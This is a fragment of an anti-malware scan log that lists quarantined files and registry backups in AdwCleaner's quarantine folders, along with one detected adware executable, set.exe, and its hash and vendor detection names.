         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
         -0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.0s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.1s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.1s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.2s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.2s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.2s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.2s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.3s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.4s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.4s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.5s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.5s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.5s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.6s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.6s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.6s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.6s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.6s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.7s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.7s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.7s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.8s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.8s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.8s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          0.8s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          0.8s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          0.9s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          0.9s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          0.9s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          0.9s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.0s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.0s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.0s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.3s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.3s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.4s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.4s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.1s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          6.4s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          6.9s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.4s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          7.6s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         11.4s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
      Size . . . . . . . : 3.786.752 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.6
      SHA-256  . . . . . : 7444B620D5B8ADAC023BA1A4B656B8FAD5D8D4F28CEE609DED1388E43A601469
      Product  . . . . . : ExtManager
      LanguageID . . . . : 0
    > Bitdefender  . . . : Gen:Variant.Zusy.213626
    > Kaspersky  . . . . : not-a-virus:WebToolbar.MSIL.Agent.bkqa
    > HitmanPro  . . . . : App/Linkular-Q
      Fuzzy  . . . . . . : 108.0
      Forensic Cluster
         -2.0s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -2.0s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.7s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.7s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.7s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.7s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.7s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.6s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.6s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.5s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.5s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.5s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.5s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.5s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.4s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.4s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.3s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.3s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -1.1s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d85bf4971be98d9f_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dc7c883ebdb4ce43_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\dd1fa8967c9eedf1_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\e1548e7879784820_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f4beaede20fc0699_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f552ab47376f113e_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\f74a8c1655500d73_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.0s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -0.8s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
